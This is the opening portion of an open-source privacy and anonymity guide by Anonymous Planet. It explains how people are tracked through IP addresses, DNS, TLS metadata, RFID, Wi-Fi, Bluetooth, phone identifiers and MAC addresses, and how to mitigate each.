(Or “How I learned to start worrying and love privacy anonymity”)
Version 1.1.6, April 2023 by Anonymous Planet
Це послання до народу України. Ми настійно рекомендуємо вам використовувати Briar для спілкування. Ви можете знайти його тут: <https://briarproject.org/ . За допомогою цієї програми ви можете спілкуватися, навіть коли немає Інтернету. Посібник тут: https://briarproject.org/manual/uk/, Швидкий початок: https://briarproject.org/quick-start/uk/
This is a message for the people of Ukraine. We strongly recommend that you use Briar for communicating. You can find it here: https://briarproject.org/ With this application, you can communicate even when there is no internet. The manual is here: https://briarproject.org/manual/, quick-start guide here: https://briarproject.org/quick-start/
This guide is a work in progress. It will probably never be “finished”.
No affiliation with the Anonymous [Wikiless] [Archive.org] collective/movement.
There might be some wrong or outdated information in this guide because no one is perfect.
Your experience may vary. Remember to check regularly for an updated version of this guide.
This guide is a non-profit open-source initiative, licensed under Creative Commons Attribution-NonCommercial 4.0 International (cc-by-nc-4.0 [Archive.org]).
For mirrors see Appendix A6: Mirrors
For help in comparing versions see Appendix A7: Comparing versions
Feel free to submit issues (please do report anything wrong) using GitHub Issues at: https://github.com/Anon-Planet/thgtoa/issues
Feel free to come to discuss ideas at:
Rules for our chatrooms: https://anonymousplanet.org/chatrooms-rules.html
Matrix/Element Room: #anonymity:matrix.org https://matrix.to/#/#anonymity:matrix.org
Matrix Space regrouping several rooms with similar interests: #privacy-security-anonymity:matrix.org https://matrix.to/#/#privacy-security-anonymity:matrix.org.
Follow us on:
Twitter at https://twitter.com/AnonyPla
Mastodon at https://mastodon.social/@anonymousplanet
To contact me, see the updated information on the website or send an e-mail to contact@anonymousplanet.org
Please consider donating if you enjoy the project and want to support the hosting fees or support the funding of initiatives like the hosting of Tor Exit Nodes.
There are several ways you could read this guide:
You want to understand the current state of online privacy and anonymity not necessarily get too technical about it: Just read the Introduction, Requirements, Understanding some basics of how some information can lead back to you and how to mitigate those and A final editorial note sections.
You want to do the above but also learn how to remove some online information about you: Just read the above and add the Removing some traces of your identities on search engines and various platforms.
You want to do the above and create online anonymous identities online safely and securely: Read the whole guide.
Precautions while reading this guide and accessing the various links:
Documents/Files have a [Archive.org] link next to them for accessing content through Archive.org for increased privacy and in case the content goes missing. Some links are not yet archived or outdated on archive.org in which case we encourage you to ask for a new save if possible.
YouTube Videos have a [Invidious] link next to them for accessing content through an Invidious Instance (in this case yewtu.be hosted in the Netherlands) for increased privacy. It is recommended to use these links when possible. See https://github.com/iv-org/invidious [Archive.org] for more information.
Twitter links have a [Nitter] link next to them for accessing content through a Nitter Instance (in this case nitter.net) for increased privacy. It is recommended to use these links when possible. See https://github.com/zedeus/nitter [Archive.org] for more information.
Wikipedia links have a [Wikiless] link next to them for accessing content through a Wikiless Instance (in this case Wikiless.org) for increased privacy. It is recommended to use these links when possible. See https://codeberg.org/orenom/wikiless [Archive.org] for more information.
Medium links have [Scribe.rip] link next to them for accessing content through a Scribe.rip Instance for increased privacy. Again, it is recommended to use these links when possible. See https://scribe.rip/ [Archive.org] for more information.
If you are reading this in PDF or ODT format, you will notice plenty of ``` in place of double quotes (""). These ``` are there to ease conversion into Markdown/HTML format for online viewing of code blocks on the website.
If you do not want the hassle and use one of the browsers below, you could also just install the following extension on your browser: https://libredirect.github.io/ [Archive.org]:
Firefox: https://addons.mozilla.org/en-US/firefox/addon/libredirect/
Chromium-based browsers (Chrome, Brave, Edge): https://github.com/libredirect/libredirect/blob/master/chromium.md
If you are having trouble accessing any of the many academic articles referenced in this guide due to paywalls, feel free to use Sci-Hub (https://en.wikipedia.org/wiki/Sci-Hub [Wikiless] [Archive.org]) or LibGen (https://en.wikipedia.org/wiki/Library_Genesis [Wikiless] [Archive.org]) for finding and reading them. Because Science should be free. All of it. If you are faced with a paywall accessing some resources, consider using https://12ft.io/.
Finally note that this guide does mention and even recommends various commercial services (such as VPNs, CDNs, e-mail providers, hosting providers…) but is not endorsed or sponsored by any of them in any way. There are no referral links and no commercial ties with any of these providers. This project is 100% non-profit and only relying on donations.
Understanding of the English language (in this case American English).
Be a permanent resident in Germany where the courts have upheld the legality of not using real names on online platforms (§13 VI of the German Telemedia Act of 20071’2). Alternatively, be a resident of any other country where you can confirm and verify the legality of this guide yourself.
This guide will assume you already have access to some (Windows/Linux/macOS) laptop computer - ideally not a work/shared device - and a basic understanding of how computers work.
Have patience, as this process could take several weeks to complete if you want to go through all the content.
Have some free time on your hands to dedicate to this process (depending on which route you pick).
Be prepared to read a lot of references (do read them), guides (do not skip them), and tutorials thoroughly (do not skip them either).
Don’t be evil (for real this time)3.
Understand that there is no common path that will be both quick and easy.
This guide is not intended for:
Creating bot accounts of any kind.
Creating impersonation accounts of existing people (such as identity theft).
Helping malicious actors conduct unethical, criminal, or illicit activities (such as trolling, stalking, disinformation, misinformation, harassment, bullying, or fraud).
Use by minors.
TLDR for the whole guide: “A strange game. The only winning move is not to play” 4.
Making a social media account with a pseudonym or artist/brand name is easy. And it is enough in most use cases to protect your identity as the next George Orwell. There are plenty of people using pseudonyms all over Facebook/Instagram/Twitter/LinkedIn/TikTok/Snapchat/Reddit/… But the vast majority of those are anything but anonymous and can easily be traced to their real identity by your local police officers, random people within the OSINT5 (Open-Source Intelligence) community, and trolls6 on 4chan7.
This is a good thing as most criminals/trolls are not tech-savvy and will usually be identified with ease. But this is also a terrible thing as most political dissidents, human rights activists and whistleblowers can also be tracked rather easily.
This guide aims to provide an introduction to various de-anonymization techniques, tracking techniques, ID verification techniques, and optional guidance to creating and maintaining reasonably and truly online anonymous identities including social media accounts safely. This includes mainstream platforms and not only the privacy-friendly ones.
It is important to understand that the purpose of this guide is anonymity and not just privacy but much of the guidance you will find here will also help you improve your privacy and security even if you are not interested in anonymity. There is an important overlap in techniques and tools used for privacy, security, and anonymity but they differ at some point:
Privacy is about people knowing who you are but not knowing what you are doing.
Anonymity is about people knowing what you are doing but not knowing who you are 8.
(Illustration from9)
Will this guide help you protect yourself from the NSA, the FSB, Mark Zuckerberg, or the Mossad if they are out to find you? Probably not … Mossad will be doing “Mossad things” 10 and will probably find you no matter how hard you try to hide11.
You must consider your threat model12 before going further.
(Illustration by Randall Munroe, xkcd.com, licensed under CC BY-NC 2.5)
Will this guide help you protect your privacy from OSINT researchers like Bellingcat13, Doxing14 trolls on 4chan15, and others that have no access to the NSA toolbox? More likely. Tho we would not be so sure about 4chan.
Here is a basic simplified threat model for this guide:
(Note that the “magical amulets/submarine/fake your own death” jokes are quoted from the excellent article “This World of Ours” by James Mickens, 2014.16)
Disclaimer: Jokes aside (magical amulet…). Of course, there are also advanced ways to mitigate attacks against such advanced and skilled adversaries but those are just out of the scope of this guide. It is crucially important that you understand the limits of the threat model of this guide. And therefore, this guide will not double in size to help with those advanced mitigations as this is just too complex and will require an exceedingly high knowledge and skill level that is not expected from the targeted audience of this guide.
The EFF provides a few security scenarios of what you should consider depending on your activity. While some of those tips might not be within the scope of this guide (more about Privacy than Anonymity), they are still worth reading as examples. See https://ssd.eff.org/en/module-categories/security-scenarios [Archive.org].
If you want to go deeper into threat modeling, see Appendix B3: Threat modeling resources.
You might think this guide has no legitimate use but there are many17‘18’19‘20’21‘22’23 such as:
Evading Online Censorship24
Evading Online Oppression
Evading Online Stalking, Doxxing, and Harassment
Evading Online Unlawful Government Surveillance
Anonymous Online Whistle Blowing
Anonymous Online Activism
Anonymous Online Journalism
Anonymous Online Legal Practice
Anonymous Online Academic Activities (For instance accessing scientific research where such resources are blocked). See note below.
…
This guide is written with hope for those good-intended individuals who might not be knowledgeable enough to consider the big picture of online anonymity and privacy.
Lastly, use it at your own risk. Anything in here is not legal advice and you should verify compliance with your local law before use (IANAL25). “Trust but verify”26 all the information yourself (or even better, “Never Trust, always verify”27). We strongly encourage you to inform yourself and do not hesitate to check any information in this guide with outside sources in case of doubt. Please do report any mistake you spot to us as we welcome criticism. Even harsh but sound criticism is welcome and will result in having the necessary corrections made as quickly as possible.
There are many ways you can be tracked besides browser cookies and ads, your e-mail, and your phone number. And if you think only the Mossad or the NSA/FSB can find you, you would be wrong.
First, you could also consider these more general resources on privacy and security to learn more basics:
The New Oil*: https://thenewoil.org/ [Archive.org]
Techlore videos*: https://www.youtube.com/c/Techlore [Invidious]
Privacy Guides: https://privacyguides.org/ [Archive.org]
Privacy Tools*: https://privacytools.io [Archive.org]
Note that these websites could contain affiliate/sponsored content and/or merchandising. This guide does not endorse and is not sponsored by any commercial entity in any way.
If you skipped those, you should really still consider viewing this YouTube playlist from the Techlore Go Incognito project (https://github.com/techlore-official/go-incognito [Archive.org]) as an introduction before going further: https://www.youtube.com/playlist?list=PL3KeV6Ui_4CayDGHw64OFXEPHgXLkrtJO [Invidious]. This guide will cover many of the topics in the videos of this playlist with more details and references as well as some added topics not covered within that series. This will just take you 2 or 3 hours to watch it all.
Now, here is a non-exhaustive list of some of the many ways you could be tracked and de-anonymized:
Disclaimer: this whole paragraph is about your public-facing Internet IP and not your local network IP.
Your IP address28 is the most known and obvious way you can be tracked. That IP is the IP you are using at the source. This is where you connect to the internet. That IP is usually provided by your ISP (Internet Service Provider) (xDSL, Mobile, Cable, Fiber, Cafe, Bar, Friend, Neighbor). Most countries have data retention regulations29 that mandate keeping logs of who is using what IP at a certain time/date for up to several years or indefinitely. Your ISP can tell a third party that you were using a specific IP at a specific date and time, years after the fact. If that IP (the original one) leaks at any point for any reason, it can be used to track down you directly. In many countries, you will not be able to have internet access without providing some form of identification to the provider (address, ID, real name, e-mail …).
Needless to say, that most platforms (such as social networks) will also keep (sometimes indefinitely) the IP addresses you used to sign-up and sign into their services.
Here are some online resources you can use to find some information about your current public IP right now:
Find your IP:
https://www.dnsleaktest.com/ (Bonus, check your IP for DNS leaks)
Find your IP location or the location of any IP:
Find if an IP is “suspicious” (in blocklists) or has downloaded “things” on some public resources:
https://iknowwhatyoudownload.com (Take this with a grain of salt, it might not show anything interesting and has limited data sources. This is more for fun than anything serious.)
Registration information of an IP (most likely your ISP or the ISP of your connection who most likely know who is using that IP at any time):
Check for open-services or open devices on an IP (especially if there are leaky Smart Devices on it):
Various tools to check your IP such as block-lists checkers and more:
Would you like to know if you are connected through Tor?
For those reasons, you will need to obfuscate and hide that origin IP (the one tied to your identification) or hide it through a combination of various means:
Using a public Wi-Fi service (free).
Using the Tor Anonymity Network30 (free).
Using VPN31 services anonymously (anonymously paid with cash or Monero).
Do note that, unfortunately, these solutions are not perfect, and you will experience performance issues32.
All those will be explained later in this guide.
DNS stands for “Domain Name System”33 and is a service used by your browser (and other apps) to find the IP addresses of a service. It is a huge “contact list” (phone book for older people) that works like asking it a name and it returns the number to call. Except it returns an IP instead.
Every time your browser wants to access a certain service such as Google through www.google.com. Your Browser (Chrome or Firefox) will query a DNS service to find the IP addresses of the Google web servers.
Here is a video explaining DNS visually if you are already lost: https://www.youtube.com/watch?v=vrxwXXytEuI [Invidious]
Usually, the DNS service is provided by your ISP and automatically configured by the network you are connecting to. This DNS service could also be subject to data retention regulations or will just keep logs for other reasons (data collection for advertising purposes for instance). Therefore, this ISP will be capable of telling everything you did online just by looking at those logs which can, in turn, be provided to an adversary. Conveniently this is also the easiest way for many adversaries to apply censoring or parental control by using DNS blocking34. The provided DNS servers will give you a different address (than their real one) for some websites (like redirecting thepiratebay.org to some government website). Such blocking is widely applied worldwide for certain sites35.
Using a private DNS service or your own DNS service would mitigate these issues, but the other problem is that most of those DNS requests are by default still sent in clear text (unencrypted) over the network. Even if you browse PornHub in an incognito Window, using HTTPS and using a private DNS service, chances are exceedingly high that your browser will send a clear text unencrypted DNS request to some DNS servers asking basically “So what’s the IP address of www.pornhub.com?”.
Because it is not encrypted, your ISP and/or any other adversary could still intercept (using a Man-in-the-middle attack36) your request will know and possibly log what your IP was looking for. The same ISP can also tamper with the DNS responses even if you are using a private DNS. Rendering the use of a private DNS service useless.
As a bonus, many devices and apps will use hardcoded DNS servers bypassing any system setting you could set. This is for example the case with most (70%) Smart TVs and a large part (46%) of Game Consoles37. For these devices, you will have to force them38 to stop using their hardcoded DNS service which could make them stop working properly.
A solution to this is to use encrypted DNS using DoH (DNS over HTTPS39), DoT (DNS over TLS40) with a private DNS server (this can be self-hosted locally with a solution like pi-hole41, remotely hosted with a solution like nextdns.io or using the solutions provided by your VPN provider or the Tor network). This should prevent your ISP or some go-between from snooping on your requests … except it might not.
Small in-between Disclaimer: This guide does not necessarily endorse or recommend Cloudflare services even if it is mentioned several times in this section for technical understanding.
Unfortunately, the TLS protocol used in most HTTPS connections in most Browsers (Chrome/Brave among them) will leak the Domain Name again through SNI42 handshakes (this can be checked here at Cloudflare: https://www.cloudflare.com/ssl/encrypted-sni/ [Archive.org] ). As of the writing of this guide, only Firefox-based browsers supports ECH (Encrypted Client Hello43 previously known as eSNI44) on some websites which will encrypt everything end to end (in addition to using a secure private DNS over TLS/HTTPS) and will allow you to hide your DNS requests from a third party45. And this option is not enabled by default either so you will have to enable it yourself.
[][50]
In addition to limited browser support, only web Services and CDNs46 behind Cloudflare CDN support ECH/eSNI at this stage47. This means that ECH and eSNI are not supported (as of the writing of this guide) by most mainstream platforms such as:
Amazon (including AWS, Twitch…)
Microsoft (including Azure, OneDrive, Outlook, Office 365…)
Google (including Gmail, Google Cloud…)
Apple (including iCloud, iMessage…)
YouTube
GitHub
…
Some countries like Russia48 and China49 might (unverified despite the articles) block ECH/eSNI handshakes at the network level to allow snooping and prevent bypassing censorship. Meaning you will not be able to establish an HTTPS connection with a service if you do not allow them to see what it was.
The issues do not end here. Part of the HTTPS TLS validation is called OCSP50 and this protocol used by Firefox-based browsers will leak metadata in the form of the serial number of the certificate of the website you are visiting. An adversary can then easily find which website you are visiting by matching the certificate number51. This issue can be mitigated by using OCSP stapling52. Unfortunately, this is enabled but not enforced by default in Firefox/Tor Browser. But the website you are visiting must also be supporting it and not all do. Chromium-based browsers on the other hand use a different system called CRLSets53’54 which is arguably better.
Here is a list of how various browsers behave with OCSP: https://www.ssl.com/blogs/how-do-browsers-handle-revoked-ssl-tls-certificates/ [Archive.org]
Here is an illustration of the issue you could encounter on Firefox-based browsers:
[][52]
Finally, even if you use a custom encrypted DNS server (DoH or DoT) with ECH/eSNI support and OCSP stapling, it might still not be enough as traffic analysis studies55 have shown it is still possible to reliably fingerprint and block unwanted requests. Only DNS over Tor was able to show efficient DNS Privacy in recent studies but even that can still be defeated by other means (see Your Anonymized Tor/VPN traffic).
One could also decide to use a Tor Hidden DNS Service or ODoH (Oblivious DNS over HTTPS56) to further increase privacy/anonymity but unfortunately, as far as we know, these methods are only provided by Cloudflare as of this writing (https://blog.cloudflare.com/welcome-hidden-resolver/ [Archive.org], https://blog.cloudflare.com/oblivious-dns/ [Archive.org]). These are workable and reasonably secure technical options but there is also a moral choice if you want to use Cloudflare or not (despite the risk posed by some researchers57).
Note that Oblivious DNS addresses an adversary that eavesdrops on one of the connections listed here but not all. It does not address a global passive adversary (GPA) who can eavesdrop on many or all of these connections: - traffic between the client resolver and the recursive resolver - the recursive resolver and the ODNS resolver - the ODNS resolver and an authoritative server.
Lastly, there is also this new possibility called DoHoT which stands for DNS over HTTPS over Tor which could also further increase your privacy/anonymity and which you could consider if you are more skilled with Linux. See https://github.com/alecmuffett/dohot [Archive.org]. This guide will not help you with this one at this stage, but it might be coming soon.
Here is an illustration showing the current state of DNS and HTTPS privacy based on our current knowledge.
[][56]
As for your normal daily use (non-sensitive), remember that only Firefox-based browsers support ECH (formerly eSNI) so far and that it is only useful with websites hosted behind Cloudflare CDN at this stage. If you prefer a Chrome-based version (which is understandable for some due to some better-integrated features like on-the-fly Translation), then we would recommend the use of Brave instead which supports all Chrome extensions and offers much better privacy than Chrome.
But the story does not stop there right. Now because after all this, even if you encrypt your DNS and use all possible mitigations. Simple IP requests to any server will probably allow an adversary to still detect which site you are visiting. And this is simply because the majority of websites have unique IPs tied to them as explained here: https://blog.apnic.net/2019/08/23/what-can-you-learn-from-an-ip-address/ [Archive.org]. This means that an adversary can create a dataset of known websites for instance including their IPs and then match this dataset against the IP you ask for. In most cases, this will result in a correct guess of the website you are visiting. This means that despite OCSP stapling, despite ECH/eSNI, despite using Encrypted DNS … An adversary can still guess the website you are visiting anyway.
Therefore, to mitigate all these issues (as much as possible and as best as we can), this guide will later recommend two solutions: Using Tor and a virtualized (See Appendix W: Virtualization) multi-layered solution of VPN over Tor solution (DNS over VPN over Tor or DNS over TOR). Other options will also be explained (Tor over VPN, VPN only, No Tor/VPN) but are less recommended.
RFID stands for Radio-frequency identification58, it is the technology used for instance for contactless payments and various identification systems. Of course, your smartphone is among those devices and has RFID contactless payment capabilities through NFC59. As with everything else, such capabilities can be used for tracking by various actors.
But unfortunately, this is not limited to your smartphone, and you also probably carry some amount of RFID enabled device with you all the time such as:
Your contactless-enabled credit/debit cards
Your store loyalty cards
Your transportation payment cards
Your work-related access cards
Your car keys
Your national ID or driver license
Your passport
The price/anti-theft tags on object/clothing
…
While all these cannot be used to de-anonymize you from a remote online adversary, they can be used to narrow down a search if your approximate location at a certain time is known. For instance, you cannot rule out that some stores will effectively scan (and log) all RFID chips passing through the door. They might be looking for their loyalty cards but are also logging others along the way. Such RFID tags could be traced to your identity and allow for de-anonymization.
More information over at Wikipedia: https://en.wikipedia.org/wiki/Radio-frequency_identification#Security_concerns [Wikiless] [Archive.org] and https://en.wikipedia.org/wiki/Radio-frequency_identification#Privacy [Wikiless] [Archive.org]
The only way to mitigate this problem is to have no RFID tags on you or to shield them again using a type of Faraday cage. You could also use specialized wallets/pouches that specifically block RFID communications. Many of those are now made by well-known brands such as Samsonite60. You should just not carry such RFID devices while conducting sensitive activities.
See Appendix N: Warning about smartphones and smart devices
Geolocation is not only done by using mobile antennas triangulation. It is also done using the Wi-Fi and Bluetooth devices around you. Operating systems makers like Google (Android61) and Apple (IOS62) maintain a convenient database of most Wi-Fi access points, Bluetooth devices, and their location. When your Android smartphone or iPhone is on (and not in Plane mode), it will scan actively (unless you specifically disable this feature in the settings) Wi-Fi access points, and Bluetooth devices around you and will be able to geolocate you with more precision than when using a GPS.
This active and continuous probing can then be sent back to Google/Apple/Microsoft as part of their Telemetry. The issue is that this probing is unique and can be used to uniquely identify a user and track such user. Shops, for example, can use this technique to fingerprint customers including when they return, where they go in the shop and how long they stay at a particular place. There are several papers63’64 and articles65 describing this issue in depth.
This allows them to provide accurate locations even when GPS is off, but it also allows them to keep a convenient record of all Wi-Fi Bluetooth devices all over the world. Which can then be accessed by them or third parties for tracking.
Note: If you have an Android smartphone, Google probably knows where it is no matter what you do. You cannot really trust the settings. The whole operating system is built by a company that wants your data. Remember that if it is free then you are the product.
But that is not what all those Wi-Fi access points can do. Recently developed techs could even allow someone to track your movements accurately just based on radio interferences. What this means is that it is possible to track your movement inside a room/building based on the radio signals passing through. This might seem like a tinfoil hat conspiracy theory claim but here are the references66 with demonstrations showing this tech in action: http://rfpose.csail.mit.edu/ [Archive.org] and the video here: https://www.youtube.com/watch?v=HgDdaMy8KNE [Invidious]
Other researchers have found a way to count the people in a defined space using only Wi-Fi, see https://www.news.ucsb.edu/2021/020392/dont-fidget-wifi-will-count-you [Archive.org]
You could therefore imagine many use cases for such technologies like recording who enters specific buildings/offices (hotels, hospitals, or embassies for instance) and then discover who meets who and thereby tracking them from outside. Even if they have no smartphone on them.
[][63]
Again, such an issue could only be mitigated by being in a room/building that would act as a Faraday cage.
Here is another video of the same kind of tech in action: https://www.youtube.com/watch?v=FDZ39h-kCS8 [Invidious]
See Appendix N: Warning about smartphones and smart devices
There is not much you can do about these. Besides being non-identifiable in the first place.
These have been used at least since 2008 using an attack called “Jasager”67 and can be done by anyone using self-built tools or using commercially available devices such as Wi-Fi Pineapple68.
Here are some videos explaining more about the topic:
YouTube, Hak5, Wi-Fi Pineapple Mark VII https://www.youtube.com/watch?v=7v3JR4Wlw4Q [Invidious]
These devices can fit in a small bag and can take over the Wi-Fi environment of any place within their range. For instance, a Bar/Restaurant/Café/Hotel Lobby. These devices can force Wi-Fi clients to disconnect from their current Wi-Fi (using de-authentication, disassociation attacks69) while spoofing the normal Wi-Fi networks at the same location. They will continue to perform this attack until your computer, or you decide to try to connect to the rogue AP.
These devices can then mimic a captive portal70 with the exact same layout as the Wi-Fi you are trying to access (for instance an Airport Wi-Fi registration portal). Or they could just give you unrestricted access internet that they will themselves get from the same place.
Once you are connected through the Rogue AP, this AP will be able to execute various man-in-the-middle attacks to perform analysis on your traffic. These could be malicious redirections or simple traffic sniffing. These can then easily identify any client that would for instance try to connect to a VPN server or the Tor Network.
This can be useful when you know someone you want to de-anonymize is in a crowded place, but you do not know who. This would allow such an adversary to possibly fingerprint any website you visit despite the use of HTTPS, DoT, DoH, ODoH, VPN, or Tor using traffic analysis as pointed above in the DNS section.
These can also be used to carefully craft and serve you advanced phishing webpages that would harvest your credentials or try to make you install a malicious certificate allowing them to see your encrypted traffic.
How to mitigate those? If you do connect to a public wi-fi access point, use Tor, or use a VPN and then Tor (Tor over VPN) or even (VPN over Tor) to obfuscate your traffic from the rogue AP while still using it.
Tor and VPNs are not silver bullets. Many advanced techniques have been developed and studied to de-anonymize encrypted Tor traffic over the years71. Most of those techniques are Correlation attacks that will correlate your network traffic in one way or another to logs or datasets. Here are some examples:
[][67]
[][68]
[][69]
There are ways to mitigate these such as:
Do not use Tor/VPNs to access services that are on the same network (ISP) as the destination service. For example, do not connect to Tor from your University Network to access a University Service anonymously. Instead, use a different source point (such as a public Wi-Fi) that cannot be correlated easily by an adversary.
Do not use Tor/VPN from an obviously heavily monitored network (such as a corporate/governmental network) but instead try to find an unmonitored network such as a public Wi-Fi or a residential Wi-Fi.
Consider the use of multiple layers (such as what will be recommended in this guide later: VPN over Tor) so that an adversary might be able to see that someone connected to the service through Tor but will not be able to see that it was you because you were connected to a VPN and not the Tor Network.
Be aware again that this might not be enough against a motivated global adversary77 with wide access to global mass surveillance. Such an adversary might have access to logs no matter where you are and could use those to de-anonymize you. Usually, these attacks are part of what is called a Sybil Attack78. These adversaries are out of the scope of this guide.
Be also aware that all the other methods described in this guide such as Behavioral analysis can also be used to deanonymize Tor users indirectly (see further Your Digital Fingerprint, Footprint, and Online Behavior).
I also strongly recommend reading this very good, complete, and thorough (and more detailed) guide on most known Attack Vectors on Tor: https://github.com/Attacks-on-Tor/Attacks-on-Tor [Archive.org] as well as this recent research publication https://www.researchgate.net/publication/323627387_Shedding_Light_on_the_Dark_Corners_of_the_Internet_A_Survey_of_Tor_Research [Archive.org]
As well as this great series of blog posts: https://www.hackerfactor.com/blog/index.php?/archives/906-Tor-0day-The-Management-Vulnerability.html [Archive.org]
Recently, one of these attacks was attempted on the Tor Network with more information here: https://arstechnica.com/information-technology/2014/07/active-attack-on-tor-network-tried-to-decloak-users-for-five-months/ [Archive.org]
Lastly, do remember that using Tor can already be considered suspicious activity79, and its use could be considered malicious by some80.
This guide will later propose some mitigations to such attacks by changing your origin from the start (using public wi-fi’s for instance). Remember that such attacks are usually carried by highly skilled, highly resourceful, and motivated adversaries and are out of scope from this guide. It is also recommended that you learn about practical correlation attacks, as performed by intelligence agencies: https://officercia.mirror.xyz/WeAilwJ9V4GIVUkYa7WwBwV2II9dYwpdPTp3fNsPFjo [Archive.org]
Disclaimer: it should also be noted that Tor is not designed to protect against a global adversary. For more information see https://svn-archive.torproject.org/svn/projects/design-paper/tor-design.pdf [Archive.org] and specifically, “Part 3. Design goals and assumptions.”.
You have seen this in action/spy/Sci-Fi movies and shows, the protagonists always remove the battery of their phones to make sure it cannot be used. Most people would think that’s overkill. Well, unfortunately, no, this is now becoming true at least for some devices:
Such devices will continue to broadcast identity information to nearby devices even when offline using Bluetooth Low-Energy85. They do not have access to the devices directly (which are not connected to the internet) but instead use BLE to find them through other nearby devices86. They are using peer-to-peer short-range Bluetooth communication to broadcast their status through nearby online devices.
They could now find such devices and keep the location in some database that could then be used by third parties or themselves for various purposes (including analytics, advertising, or evidence/intelligence gathering).
See Appendix N: Warning about smartphones and smart devices
TLDR: Do not take such devices with you when conducting sensitive activities.
The IMEI (International Mobile Equipment Identity87) and the IMSI (International Mobile Subscriber Identity88) are unique numbers created by cell phone manufacturers and cell phone operators.
The IMEI is tied directly to the phone you are using. This number is known and tracked by the cell phone operators and known by the manufacturers. Every time your phone connects to the mobile network, it will register the IMEI on the network along with the IMSI (if a SIM card is inserted but that is not even needed). It is also used by many applications (Banking apps abusing the phone permission on Android for instance89) and smartphone Operating Systems (Android/IOS) for identification of the device90. It is possible but difficult (and not illegal in many jurisdictions91) to change the IMEI on a phone but it is probably easier and cheaper to just find and buy some old (working) Burner phone for a few Euros (this guide is for Germany remember) at a flea market or some random small shop.
The IMSI is tied directly to the mobile subscription or pre-paid plan you are using and is tied to your phone number by your mobile provider. The IMSI is hardcoded directly on the SIM card and cannot be changed. Remember that every time your phone connects to the mobile network, it will also register the IMSI on the network along with the IMEI. Like the IMEI, the IMSI is also being used by some applications and smartphone Operating systems for identification and is being tracked. Some countries in the EU for instance maintain a database of IMEI/IMSI associations for easy querying by Law Enforcement.
Today, giving away your (real) phone number is the same or better than giving away your Social Security number/Passport ID/National ID.
The IMEI and IMSI can be traced back to you in at least six ways:
The mobile operator subscriber logs will usually store the IMEI along with the IMSI and their subscriber information database. If you use a prepaid anonymous SIM (anonymous IMSI but with a known IMEI), they could see this cell belongs to you if you used that cell phone before with a different SIM card (different anonymous IMSI but same known IMEI).
The mobile operator antenna logs will conveniently keep a log of which IMEI. IMSI also keep some connection data. They know and log for instance that a phone with this IMEI/IMSI combination connected to a set of mobile antennas and how powerful the signal to each of those antennas were, allowing easy triangulation/geolocation of the signal. They also know which other phones (your real one for instance) connected at the same time to the same antennas with the same signal. This makes it possible to know precisely that this “burner phone” was always connected at the same place/time than this other “known phone” which shows up every time the burner phone is being used. This information can/is used by various third parties to geolocate/track you quite precisely92’93.
The manufacturer of the Phone can trace back the sale of the phone using the IMEI if that phone was bought in a non-anonymous way. Indeed, they will have logs of each phone sale (including serial number and IMEI), to which shop/person to whom it was sold. And if you are using a phone that you bought online (or from someone that knows you). It can be traced to you using that information. Even if they do not find you on CCTV94 and you bought the phone using cash, they can still find what other phone (your real one in your pocket) was there (in that shop) at that time/date by using the antenna logs.
The IMSI alone can be used to find you as well because most countries now require customers to provide an ID when buying a SIM card (subscription or pre-paid). The IMSI is then tied to the identity of the buyer of the card. In the countries where the SIM can still be bought with cash (like the UK), they still know where (which shop) it was bought and when. This information can then be used to retrieve information from the shop itself (such as CCTV footage as for the IMEI case). Or again the antenna logs can also be used to figure out which other phone was there at the moment of the sale.
The smartphone OS makers (Google/Apple for Android/IOs) also keep logs of IMEI/IMSI identifications tied to Google/Apple accounts and which user has been using them. They too can trace back the history of the phone and to which accounts it was tied in the past95.
Government agencies around the world interested in your phone number can and do use96 special devices called “IMSI catchers”97 like the Stingray98 or more recently the Nyxcell99. These devices can impersonate (to spoof) a cell phone Antenna and force a specific IMSI (your phone) to connect to it to access the cell network. Once they do, they will be able to use various MITM100 (Man-In-The-Middle Attacks) that will allow them to:
Tap your phone (voice calls and SMS).
Sniff and examine your data traffic.
Impersonate your phone number without controlling your phone.
…
Here is also a good YouTube video on this topic: DEFCON Safe Mode - Cooper Quintin - Detecting Fake 4G Base Stations in Real-Time https://www.youtube.com/watch?v=siCk4pGGcqA [Invidious]
For these reasons, it is crucial to get a dedicated anonymous phone number and/or an anonymous burner phone with a cash-bought pre-paid sim card that is not tied to you in any way (past or present) for conducting sensitive activities. It is also possible to get an anonymous pre-paid but preferably dedicated number from free and paid online services accepting anonymous cryptocurrencies like Monero. Get more practical guidance here: Getting an anonymous Phone number.
While there are some smartphones manufacturers like Purism with their Librem series101 who claim to have your privacy in mind, they still do not allow IMEI randomization which we believe is a key anti-tracking feature that should be provided by such manufacturers. While this measure will not prevent IMSI tracking within the SIM card, it would at least allow you to keep the same “burner phone” and only switch SIM cards instead of having to switch both for privacy.
See Appendix N: Warning about smartphones and smart devices
The MAC address102 is a unique identifier tied to your physical Network Interface (Wired Ethernet or Wi-Fi) and could of course be used to track you if it is not randomized. As it was the case with the IMEI, manufacturers of computers and network cards usually keep logs of their sales (usually including things like serial number, IMEI, Mac Addresses, …) and it is possible again for them to track where and when the computer with the MAC address in question was sold and to whom. Even if you bought it with cash in a supermarket, the supermarket might still have CCTV (or a CCTV just outside that shop) and again the time/date of sale could be used to find out who was there using the Mobile Provider antenna logs at that time (IMEI/IMSI).
Operating Systems makers (Google/Microsoft/Apple) will also keep logs of devices and their MAC addresses in their logs for device identification (Find my device type services for example). Apple can tell that the MacBook with this specific MAC address was tied to a specific Apple Account before. Maybe yours before you decided to use the MacBook for sensitive activities. Maybe to a different user who sold it to you but remembers your e-mail/number from when the sale happened.
Your home router/Wi-Fi access point keeps logs of devices that are registered on the Wi-Fi, and these can be accessed too to find out who has been using your Wi-Fi. Sometimes this can be done remotely (and silently) by the ISP depending on if that router/Wi-Fi access point is being “managed” remotely by the ISP (which is often the case when they provide the router to their customers).
Some commercial devices will keep a record of MAC addresses roaming around for various purposes such as road congestion103.
So, it is important again not to bring your phone along when/where you conduct sensitive activities. If you use your own laptop, then it is crucial to hide that MAC address (and Bluetooth address) anywhere you use it and be extra careful not to leak any information. Thankfully many recent OSes now feature or allow the possibility to randomize MAC addresses (Android, IOS, Linux, and Windows 10/11) with the notable exception of macOS which does not support this feature even in its latest Big Sur version.
See Appendix N: Warning about smartphones and smart devices
Your Bluetooth MAC is like the earlier MAC address except it is for Bluetooth. Again, it can be used to track you as manufacturers and operating system makers keep logs of such information. It could be tied to a sale place/time/date or accounts and then could be used to track you with such information, the shop billing information, the CCTV, or the mobile antenna logs in correlation.
Operating systems have protections in place to randomize those addresses but are still subject to vulnerabilities104.
